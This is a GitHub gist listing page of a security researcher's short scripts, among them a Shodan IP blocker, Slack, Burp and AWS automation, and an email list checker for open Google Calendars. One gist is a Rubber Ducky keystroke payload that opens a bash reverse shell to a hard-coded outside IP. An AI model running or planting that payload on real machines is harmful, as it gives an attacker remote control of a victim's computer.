Skip to content

Instantly share code, notes, and snippets.

Avatar

Jerry Gamblin jgamblin

View GitHub Profile
@jgamblin
jgamblin / antiautosploit.py
Last active Feb 20, 2021
Blocks Shodan IPs From Scanning Your Servers.
View antiautosploit.py
#!/usr/bin/python3
import os
shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38", "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142", "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107", "98.143.148.135"]
for ip in shodan:
os.system("iptables -A INPUT -s {} -j DROP".format(ip))
@jgamblin
jgamblin / gist:2441964a1266764ed71f3243f87bbeec
Created May 8, 2016
Install Raspi-Config and rpi-update on Kali.
View gist:2441964a1266764ed71f3243f87bbeec
sudo apt-get update
sudo apt-get install lua5.1 alsa-utils triggerhappy curl libcurl3
wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20160322_all.deb
wget http://archive.raspberrypi.org/debian/pool/main/r/rpi-update/rpi-update_20140705_all.deb
dpkg -i raspi-config_20160322_all.deb
dpkg -i rpi-update_20140705_all.deb
@jgamblin
jgamblin / alexale.txt
Last active Feb 12, 2021
Alexa Top 1 Million Domains Using Let's Encrypt
View alexale.txt
wittyfeed.com
onlinevideoconverter.com
themeforest.net
pixabay.com
codecanyon.net
pornhublive.com
kohsantepheapdaily.com.kh
sammobile.com
wikileaks.org
colourpop.com
View commonssids.txt
ssid
xfinitywifi
linksys
<no ssid>
BTWiFi-with-FON
NETGEAR
Ziggo
dlink
BTWifi-X
default
@jgamblin
jgamblin / gist:a9f2ef27c78dfe3e5e65645fe9d1b970
Created Sep 17, 2019
Check a List Of Emails For Open Google Calendars.
View gist:a9f2ef27c78dfe3e5e65645fe9d1b970
#!/usr/bin/env bash
# Check a List Of Emails For Open Google Calendars.
if [[ $# -eq 0 ]]; then
echo 'Please provide a list email addresses to check.'
exit 1
fi
email_list="$1"
@jgamblin
jgamblin / digicertacm.sh
Created Nov 4, 2017
Automating Digicert Certificates Into AWS ACM
View digicertacm.sh
#!/bin/bash
#Required
apikey=
domain=
commonname=$1
orgid=
#Change to your company details
country=
@jgamblin
jgamblin / slackspotify.sh
Created Apr 19, 2017
A Script To Set Current Spotify Song As Slack Status
View slackspotify.sh
#!/bin/bash
APIKEY="From Here https://api.slack.com/custom-integrations/legacy-tokens"
SONG=$(osascript -e 'tell application "Spotify" to name of current track as string')
URLSONG=$(echo "$SONG" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"')
while true
do
curl -s -d "payload=$json" "https://slack.com/api/users.profile.set?token="$APIKEY"&profile=%7B%22status_text%22%3A%22"$URLSONG"%22%2C%22status_emoji%22%3A%22%3Amusical_note%3A%22%7D" > /dev/null
sleep 60
done
@jgamblin
jgamblin / NCNP.txt
Created Nov 30, 2016
No Persistent NetCat Backdoor For Rubber Ducky
View NCNP.txt
DELAY 2000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING bash -i >& /dev/tcp/192.241.157.75/443 0>&1 &
DELAY 500
ENTER
@jgamblin
jgamblin / nmapburp.sh
Created Sep 6, 2018
NMap a network and send all open web servers to Burp.
View nmapburp.sh
#!/bin/bash
#Script to Scan All Sites Found With A Simple NMAP Scan With Burp.
sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}')
for site in $sites
do
curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1
printf "Scanning %s with burp.\\n" "$site"
done
@jgamblin
jgamblin / compare.py
Created Jul 19, 2015
Compare Two Files In Python
View compare.py
#!/usr/bin/env python
# Name: compare.py
# Purpose: Compare File Informaation
# By: Jerry Gamblin
# Date: 18.07.15
# Modified 18.07.15
# Rev Level 0.1
# -----------------------------------------------